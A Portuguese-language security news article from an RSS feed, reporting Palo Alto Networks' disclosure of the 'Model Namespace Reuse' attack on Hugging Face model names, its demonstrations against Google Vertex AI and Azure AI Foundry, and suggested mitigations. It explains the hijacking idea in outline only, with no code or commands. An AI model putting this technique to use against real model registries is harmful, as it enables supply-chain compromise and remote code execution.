<p>The post <a href="https://seginfo.com.br/2025/09/05/novo-metodo-de-ataque-a-cadeia-de-suprimentos-de-ia-e-demonstrado-contra-produtos-do-google-e-microsoft/">Novo método de ataque à cadeia de suprimentos de IA é demonstrado contra produtos do Google e Microsoft</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="672" src="https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-1024x672.jpeg" alt="" class="wp-image-72841" style="aspect-ratio:1.5223855237447965;width:684px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-1024x672.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-300x197.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-150x98.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-768x504.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-1536x1009.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-2048x1345.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-1170x768.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-1559x1024.jpeg 1559w, https://seginfo.com.br/wp-content/uploads/2025/09/AdobeStock_1532944593-731x480.jpeg 731w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


<p class="wp-block-paragraph">Pesquisadores da Palo Alto Networks revelaram um novo método de ataque que representa um risco significativo para a cadeia de suprimentos de inteligência artificial (IA). A técnica, batizada de <strong>Model Namespace Reuse</strong>, foi demonstrada com impacto em produtos da Microsoft e Google, além de expor riscos potenciais para projetos de código aberto.</p>



<h2 class="wp-block-heading" id="h-como-funciona-o-ataque-model-namespace-reuse">Como funciona o ataque Model Namespace Reuse</h2>



<p class="wp-block-paragraph">O ataque consiste em criminosos digitais registrarem nomes de modelos associados a contas que foram excluídas ou transferidas em plataformas como o <strong>Hugging Face</strong>, uma das mais populares para hospedagem e compartilhamento de modelos de IA.<br>Ao reutilizar esse “espaço de nomes”, os atacantes conseguem disponibilizar modelos maliciosos, permitindo inclusive a execução arbitrária de código.</p>



<p class="wp-block-paragraph">Em termos práticos, quando um desenvolvedor referencia um modelo no formato <code>Autor/NomeDoModelo</code>, o invasor pode assumir o antigo nome do autor e criar um modelo com a mesma nomenclatura. Assim, aplicações que já utilizavam essa referência passam a puxar, sem saber, um modelo comprometido.</p>



<h2 class="wp-block-heading" id="h-demonstracoes-em-plataformas-do-google-e-microsoft">Demonstrações em plataformas do Google e Microsoft</h2>



<p class="wp-block-paragraph">Os pesquisadores da Palo Alto demonstraram a vulnerabilidade no <strong>Vertex AI</strong>, plataforma de machine learning do Google. Eles mostraram que era possível registrar um nome de conta antigo e injetar um payload que abria uma conexão reversa (reverse shell), garantindo acesso à infraestrutura por trás do modelo.</p>



<p class="wp-block-paragraph">Um cenário semelhante foi identificado na <strong>Azure AI Foundry</strong>, da Microsoft, que também permite a importação de modelos do Hugging Face. Nesse caso, os pesquisadores conseguiram obter permissões equivalentes às de um endpoint Azure, abrindo caminho para acessos não autorizados ao ambiente da nuvem.</p>



<h2 class="wp-block-heading" id="h-impacto-em-projetos-de-codigo-aberto">Impacto em projetos de código aberto</h2>



<p class="wp-block-paragraph">Além das grandes plataformas, a investigação revelou que milhares de repositórios open source também podem estar em risco por utilizarem referências no formato <code>Autor/NomeDoModelo</code>. Muitos desses projetos continuam funcionando normalmente, mesmo após a exclusão ou transferência do modelo original, o que dificulta a percepção da ameaça.</p>



<h2 class="wp-block-heading" id="h-reacoes-e-medidas-de-mitigacao">Reações e medidas de mitigação</h2>



<p class="wp-block-paragraph">Google, Microsoft e Hugging Face foram notificados sobre o problema. O Google já iniciou varreduras diárias para identificar modelos “órfãos” e mitigar abusos.<br>No entanto, segundo a Palo Alto Networks, a questão central continua representando risco a qualquer organização que confia apenas no nome do modelo. “Confiar apenas no nome de modelos não é suficiente e exige uma reavaliação crítica da segurança em todo o ecossistema de IA”, destacaram os pesquisadores.</p>



<h3 class="wp-block-heading" id="h-recomendacoes-da-palo-alto-networks">Recomendações da Palo Alto Networks</h3>



<p class="wp-block-paragraph">Para reduzir os riscos do <strong>Model Namespace Reuse</strong>, as medidas sugeridas incluem:</p>



<ul class="wp-block-list">
<li>• <strong>Fixar modelos a commits específicos</strong> para evitar mudanças inesperadas.</li>



<li>• <strong>Clonar e armazenar modelos em locais confiáveis</strong>, em vez de depender unicamente de serviços de terceiros.</li>



<li>• <strong>Realizar varreduras proativas no código</strong> para identificar referências que possam representar risco.</li>
</ul>



<p class="wp-block-paragraph">Para saber mais, clique <strong><a href="https://www.securityweek.com/ai-supply-chain-attack-method-demonstrated-against-google-microsoft-products/" target="_blank" rel="noreferrer noopener nofollow">aqui</a></strong>.</p>
<p>The post <a href="https://seginfo.com.br/2025/09/05/novo-metodo-de-ataque-a-cadeia-de-suprimentos-de-ia-e-demonstrado-contra-produtos-do-google-e-microsoft/">Novo método de ataque à cadeia de suprimentos de IA é demonstrado contra produtos do Google e Microsoft</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">72839</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
	</channel>
</rss>